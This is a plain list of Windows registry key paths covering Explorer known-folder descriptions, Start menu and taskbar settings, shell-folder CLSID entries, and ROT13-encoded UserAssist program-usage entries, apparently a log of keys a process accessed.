                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PropertyBag

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Programs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PropertyBag

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Desktop

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PropertyBag

                
                HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\SortOrderIndex

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PropertyBag

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PropertyBag

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheSMP

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheTBP

                
                HKEY_CLASSES_ROOT\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\CallForAttributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\RestrictedAttributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsFORDISPLAY

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\HideFolderVerbs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\UseDropHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsFORPARSING

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsParseDisplayName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\QueryForOverlay

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\MapNetDriveVerbs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\QueryForInfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\HideInWebView

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\HideOnDesktopPerUser

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsAliasedNotifications

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsUniversalDelegate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\NoFileFolderJunction

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\PinToNameSpaceTree

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\HasNavigationEnum

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{1F3427C8-5C10-4210-AA03-2EE45287D668}

                
                HKEY_CLASSES_ROOT\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\InProcServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\InProcServer32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\InProcServer32\LoadWithoutCOM

                
                HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\InProcServer32

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\shdocvw.dll

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1F3427C8-5C10-4210-AA03-2EE45287D668} {000214E6-0000-0000-C000-000000000046} 0xFFFF

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{1F3427C8-5C10-4210-AA03-2EE45287D668}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList

                
                HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInstrumentation

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Sversbk Cevingr Oebjfvat.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Zvpebfbsg BarQevir.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qvfcynlfjvgpu.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FavccvatGbby.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfcnvag.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\kcfepuij.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JSF.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zntavsl.rkr

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr

                
